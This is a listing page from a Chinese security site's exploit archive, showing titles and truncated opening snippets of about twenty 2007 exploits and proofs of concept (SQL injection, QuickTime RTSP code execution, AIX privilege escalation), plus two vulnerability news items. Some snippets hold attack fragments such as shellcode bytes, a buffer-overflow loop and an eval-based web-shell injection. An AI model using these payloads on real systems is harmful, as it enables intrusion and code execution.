首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Seditio CMS <= 121 Remote SQL Injection Exploit
  日期:2007-11-30 12:59:32 点击:78 评论:0
?php ## Seditio CMS = 121 Remote SQL Injection Exploit ## Software site: http://www.neocrome.net/ ## By InATeam (http://inattack.ru/) ## Requirements: MySQL = 4.1, magic_quotes_gpc=Off echo ------------------------------------------------------------
警告!暴风影音3.7.11.13 爆远程拒绝服务漏洞
  日期:2007-11-29 18:47:08 点击:76 评论:0
传说中的《暴风影音3》新版本爆漏洞,这次很夸张,远程拒绝服务. 起因是暴风影音自动更新程序会在远程监听一个端口,如果向其发送畸形数据包,就会导致自动更新程序崩溃;如果对其发送精心构造过的数据包,则足以导致用户主机在不知情的情况下被完全控制. 以下是帖子全文: CI
DeluxeBB <= 1.09 Remote Admin Email Change Exploit
  日期:2007-11-28 18:21:20 点击:41 评论:0
#!/usr/bin/python #-*- coding: iso-8859-15 -*- ''' _ __ _____ _____ _ __ | '_ / _ / / _ '_ | | | | __/ __/ | | | |_| |_|___/_/____|_| |_| ------------------------------------------------------------------------------------------------ Del
Softbiz Freelancers Script v.1 Remote SQL Injection Exploit
  日期:2007-11-26 12:45:08 点击:90 评论:0
#!/usr/bin/perl ##################################################################################### #### Softbiz Freelancers Script V.1 #### #### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) #### #####################################
RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit
  日期:2007-11-26 12:40:18 点击:80 评论:0
?php ########################## WwW.BugReport.ir ########################################### # # AmnPardaz Security Research Penetration Testing Group # # Title: RunCms`s Bug Yahoo! Crawler # Vendor: http://www.runcms.org/ # Vulnerable Version: RunCM
Apple QuickTime 7.3 RTSP Response Universal Exploit (Vista / XP)
  日期:2007-11-26 12:39:31 点击:55 评论:0
#!/usr/bin/python # Apple QuickTime 7.3 RTSP Response Vista / XPSP2 Universal # Bug discovered by Krystian Kloskowski (h07) h07@interia.pl # Edited by muts - offensive-security.com # http://www.offensive-security.com # # Tested on XP SP2 and Vista EN
PBLang <= 4.99.17.q Remote File Rewriting / Command Execution
  日期:2007-11-26 12:38:42 点击:35 评论:0
--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |_______ _____/ |_ /_ |/ |_ | |/ | | _(__ _/ ___ __ ______ | __ | | | | |/ ___| | /_____/ | || | |___|___| /__| /______ /___ __| |__
Apple Quicktime 7.2/7.3 (RSTP Response) Code Exec Exploit (Vista/XP)
  日期:2007-11-26 12:37:18 点击:77 评论:0
/* ============================================================= Apple Quicktime (Vista/XP RSTP Response) Remote Code Exec ============================================================= Discovered by: h07 Author: InTeL *Tested on: - Quicktime 7.3 on W
PHPKIT 1.6.4pl1 article.php Remote SQL Injection Exploit
  日期:2007-11-23 13:45:31 点击:107 评论:0
#!/usr/bin/perl # Vulnerability found exploit written by $h4d0wl33t (shadowleet) # Contact: shadowleet@safe-mail.net # Phpkit 1.6.4pl1 Non Public Exploit by $hadowleet, # Description: # Vulnerability in file pkinc/public/article.php # On line 71: # #
VigileCMS <= 1.8 Stealth Remote Command Execution Exploit
  日期:2007-11-23 13:44:44 点击:70 评论:0
#!/usr/bin/python #-*- coding: iso-8859-15 -*- ''' _ _ _ | |_| |_ ___ _ _ __ __ _ _ _ __ _ __| |_____ __ | _| ' / -_)|_|| '_ / _` | '_/ _` / _` / _ / __|_||____||_|| .__/__,_|_| __,___,____/__ |_| ---------------------------------------
Sciurus Hosting Panel Remote Code Injection Exploit
  日期:2007-11-19 19:32:13 点击:56 评论:0
? ob_implicit_flush(true); ? style body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scro
IceBB 1.0-rc6 Remote Database Authentication Details Exploit
  日期:2007-11-19 19:28:55 点击:65 评论:0
?php /*---------------------------------------------------------* IceBB 1.0-rc6 - Database Authentication Details Exploit [|Description:|] A security breach has been discoverd in IceBB 1.0-rc6. This breach is caused by a bad filtering of the X-Forwa
Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow PoC
  日期:2007-11-19 19:27:39 点击:68 评论:0
#include stdio.h #include stdlib.h #include architecture/i386/table.h #include i386/user_ldt.h #include unistd.h #include sys/types.h #include sys/mman.h int main(void) { union ldt_entry descs; char *buf; u_long pgsz = sysconf(_SC_PAGESIZE); if ((buf
迅雷5又(这次怎么多了一个又字)出现0-Day漏洞?!
  日期:2007-11-16 12:17:27 点击:85 评论:0
据可靠线报,迅雷5又(这次怎么多了一个又字)出现严重0-Day漏洞,病毒作者可利用该漏洞编写恶意网页,当用于浏览这些网页的时候,就会感染病毒,进而该病毒可以盗窃用户的帐号和密码,从而使用户遭受到损失。 与上次的不同,这次有漏洞的程序出现在迅雷看看(Thunder K
Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055)
  日期:2007-11-13 12:43:22 点击:61 评论:0
#!/usr/bin/perl # # Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055) # # Author: grabarz grabarz [at] grabarz.info # # Note: This exploit is modified from Hong Gil-Dong, Jeon Woo-chi PoC # (http://www.milw0rm.com/exploits/4584) # # Inte
MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability
  日期:2007-11-13 12:42:14 点击:66 评论:0
/* * MySQL =6.0 possibly affected * Kristian Erik Hermansen * Credit: Joe Gallo * You must have ALTER permissions to exploit this bug! * Scenario: You found SQL injection, but you want to punch backend server * in the nuts just for fun. Start with th
Adobe Shockwave ShockwaveVersion() Stack Overflow PoC
  日期:2007-11-09 13:57:51 点击:46 评论:0
html head script language=JavaScript DEFER function Check() { var s = AAAA; while (s.length 768 * 768) s=s+s; var obj = new ActiveXObject(SWCtl.SWCtl); //{233C1507-6A77-46A4-9443-F871F945D258} obj.ShockwaveVersion(s); } /script /head body onload=Java
IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit
  日期:2007-11-07 16:23:54 点击:93 评论:0
# #setlocale() exploit for aix 5.2 ( CVE-2006-4254 ) #thomas.pollet@gmail.com # from os import execve bof=a*580+bbbbccccddddx2fxf2x28x2f egg=x60*2350 shellcode=( # by intropy at caughq.org x7cxa5x2ax79 # xor. r5,r5,r5 x40x82xffxfd # bnel
Viewpoint Media Player for IE 3.2 Remote Stack Overflow PoC
  日期:2007-11-07 16:22:39 点击:77 评论:0
pre codespan style=font: 10pt Courier New;span class=general1-symbolbody bgcolor=#E0E0E0----------------------------------------------------------------------------- bViewpoint Media Player for IE 3.2 (AxMetaStream.dll) Remote Stack Overflow/b url: h
BC Explorer <= 7.20 RC 1 Remote Code Execution Exploit
  日期:2007-11-06 18:28:02 点击:82 评论:0
#!/usr/bin/php ?php error_reporting(E_ALL ^ E_NOTICE); head(); if($argc 3) usage(); $url = getparam('url', true); $prx = getparam('proxy', false); $pra = getparam('proxyauth', false); $cod = 'eval($_SERVER[HTTP_SHELL]);'; $xpl = new phpsploit(); $xpl
共637页/12733条记录 首页 上一页 [535] [536] [537] 538 [539] [540] [541] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved